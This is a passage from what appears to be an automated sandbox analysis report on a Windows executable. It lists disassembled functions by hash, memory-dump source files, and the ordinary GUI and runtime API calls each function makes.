                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26df1b3144b81dd329e072f6770dff52904025d434637cfca8b5ec040aa9bbac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F212A0B16187068BC718DF28C490A79B7F1FB94308F24892EE996C7781E334E995DB46
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: bb6d348274cae80767715de87a3561005160d7a5c7dc3984c006eb2140bdc5e9
                                                                                                                                                                                                    • Instruction ID: 8171f44745b7f9a67d9ac447bf98aecc662fd3f46fbc747dc028931e212e4cda
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb6d348274cae80767715de87a3561005160d7a5c7dc3984c006eb2140bdc5e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F1AB716083059FC758CF28C48462ABBE1FFDA358F288A2EF5C9D7259D630E945CB42
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 2627ef6b6b9cddc1b22454d1692af19c1948e158f5b9bd57e7ad379ab52eadfe
                                                                                                                                                                                                    • Instruction ID: 053a6f45a8aa1455ec823399ac4af17c32375b161c3b6b71f6df2a4fca7b4a4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2627ef6b6b9cddc1b22454d1692af19c1948e158f5b9bd57e7ad379ab52eadfe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E149755083949FC344CF29D89086ABFF0BF9A300F49495EF9C497352D235EA29DB92
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                                                                                                                    • Instruction ID: c57b2d6fe1b1a5f49dedde4813f547c8c575d74f9aa142378808ca07cb4cd974
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B89146B220434A8BDB28FA68D895BBE77D5FBA0304F10092DE99AC7282DB74D545C753
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                                                    • Instruction ID: ce9ce11829f509b56a626a98953bca26d33d7fcb77d5dc979f86c997c8e69fb8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E811AB23043474BDB24FE68C891BBD7794FBA0308F00593DE98ACB286DA74C9858757
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 6c3bc456d87a97827415eff3d918dca1c744b82659b0055f3d3d06aeb8e0183a
                                                                                                                                                                                                    • Instruction ID: 455bb6fefd268c4a3572cc526cee803ded2cacb46758e0d49ee55f22614ccf80
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c3bc456d87a97827415eff3d918dca1c744b82659b0055f3d3d06aeb8e0183a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A617831600F0857DE3BBBACA8957BE6394FB12754F1C0619E883DF281D651DD429716
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
• Instruction ID: b94b13161581625bdeb42701ce69a0ac52740423bfa8c136f3b10e14b8ac5c3d
• Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
• Instruction Fuzzy Hash: 6B512661604F4957DF367A2C896AFBF37C5FB01304F1C0959E983CB682CA15ED468396
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81ed2ab1d11a637921d7cb3c49b43c58ce873b21406a326bae134b740aba0d92
• Instruction ID: f6ef610258abef01b520069f36aee8e5fa88057e8ec07c405d90c980bc20b1d3
• Opcode Fuzzy Hash: 81ed2ab1d11a637921d7cb3c49b43c58ce873b21406a326bae134b740aba0d92
• Instruction Fuzzy Hash: F751D0715087958FD702CF2AC18046EBFE0FE9A314F4949A9E5DD9B243C220DA4ACB62
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80edbe239e54a6a5f1c1bef95b530885f41874b211e02c40a1685d385e3be83d
• Instruction ID: 807b5785a54e3248bb428b3b2942b203a33b0bbeb3b07c73966df919981f7b8f
• Opcode Fuzzy Hash: 80edbe239e54a6a5f1c1bef95b530885f41874b211e02c40a1685d385e3be83d
• Instruction Fuzzy Hash: A851D0B1A087159FC788CF19D48055AF7E1FF88314F058A2EE899E3740D734E959CB96
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
• Instruction ID: 37be5b0ed1f1f19583fd88246a4aa30e705d2c945b2def9f4c23fa126a435fbc
• Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
• Instruction Fuzzy Hash: BE31F8B1A147468FCB18EF28C85116EBBE0FB95704F10852DE499D7741CB35EA0ACB92
APIs
• _swprintf.LIBCMT ref: 0087E30E
  • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
  • Part of subcall function 00881DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,008B1030,?,0087D928,00000000,?,00000050,008B1030), ref: 00881DC4
• _strlen.LIBCMT ref: 0087E32F
• SetDlgItemTextW.USER32(?,008AE274,?), ref: 0087E38F
• GetWindowRect.USER32(?,?), ref: 0087E3C9
• GetClientRect.USER32(?,?), ref: 0087E3D5
• GetWindowLongW.USER32(?,000000F0), ref: 0087E475
• GetWindowRect.USER32(?,?), ref: 0087E4A2
• SetWindowTextW.USER32(?,?), ref: 0087E4DB
• GetSystemMetrics.USER32(00000008), ref: 0087E4E3
• GetWindow.USER32(?,00000005), ref: 0087E4EE
• GetWindowRect.USER32(00000000,?), ref: 0087E51B
• GetWindow.USER32(00000000,00000002), ref: 0087E58D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d
• API String ID: 2407758923-2512411981
• Opcode ID: f59130d8a1baaf380b896f8b4c5738b221c71aedd83697ea9b233939e4a45aea
• Instruction ID: 6745989b37c2648d4b7309f3fdd6719dc24eb5cd77c3b43c6f6c0c9fd35a66e9
• Opcode Fuzzy Hash: f59130d8a1baaf380b896f8b4c5738b221c71aedd83697ea9b233939e4a45aea
• Instruction Fuzzy Hash: 9A819171208301AFD710DFA8CD89A6FBBE9FF89704F04491DFA88D7254D631E9058B52
APIs
• ___free_lconv_mon.LIBCMT ref: 0089CB66
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C71E
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C730
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C742
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C754
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C766
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C778
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C78A
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C79C
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7AE
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7C0
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7D2
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7E4
  • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7F6
• _free.LIBCMT ref: 0089CB5B
  • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
  • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
• _free.LIBCMT ref: 0089CB7D
• _free.LIBCMT ref: 0089CB92
• _free.LIBCMT ref: 0089CB9D
• _free.LIBCMT ref: 0089CBBF
• _free.LIBCMT ref: 0089CBD2
• _free.LIBCMT ref: 0089CBE0
• _free.LIBCMT ref: 0089CBEB
• _free.LIBCMT ref: 0089CC23
• _free.LIBCMT ref: 0089CC2A
• _free.LIBCMT ref: 0089CC47
• _free.LIBCMT ref: 0089CC5F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                    • Opcode ID: c44d9158d7a52c3ef7fe0a9d744f76ff222c2ad03274e105acfdf35e9956d217
                                                                                                                                                                                                    • Instruction ID: dcf90462cf2802fb4b73ba0cdf9beed6833425dff18c98788036b2184b79a3be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c44d9158d7a52c3ef7fe0a9d744f76ff222c2ad03274e105acfdf35e9956d217
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B313731600206DFEF20BA7DD846B5AB7E9FF11364F184829E189D7192DE32AC80CB21
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00889736
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 008897D6
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 008897E5
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00889806
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0088982D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                                                                                                    • Opcode ID: fa1956462b855973d4817a59c5c8cd368e9a3ff4b5264554b98cd474e027f56a
                                                                                                                                                                                                    • Instruction ID: d24fa118b854309aed6f9e2d5cb0707ee8ac067f218bdeb67d92d406e9ccb5fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1956462b855973d4817a59c5c8cd368e9a3ff4b5264554b98cd474e027f56a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 413117325183027BEB25BF689C46F6F7B98FF92320F18011EF551D61D2FB649A0583A6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0088D6C1
                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0088D6ED
                                                                                                                                                                                                      • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0088D709
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088D720
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0088D734
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088D75D
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088D764
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0088D76D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                                    • String ID: STATIC
                                                                                                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                                                                                                    • Opcode ID: 70a2f46b1fce369ad4f36964cb36d78094bbcbeb004837d633fe7798556af1e1
                                                                                                                                                                                                    • Instruction ID: 9295fbca7d22265be0acaf9a9dfe7c72ed0fc55e208d2d39fbb2999dc3a62097
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a2f46b1fce369ad4f36964cb36d78094bbcbeb004837d633fe7798556af1e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA11E1726417117BE621BBB4AC4AFAF775CFB54711F008222FA51E20D2EA64CE0547A7
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899705
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899711
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089971C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899727
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899732
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089973D
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899748
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899753
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089975E
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089976C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 173cd230564891e3b81081870db73cafface3cb29eeaaf920af5dd9ec55ea83b
                                                                                                                                                                                                    • Instruction ID: d73c752d7d2cfd02939d10ee977dcb9b9be5917d55d881b519cd8180cabba139
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 173cd230564891e3b81081870db73cafface3cb29eeaaf920af5dd9ec55ea83b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511927611010AEFCF01FF98CC42CD93BB5FF15390B5955A5FA088B262DE32DA509B85
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
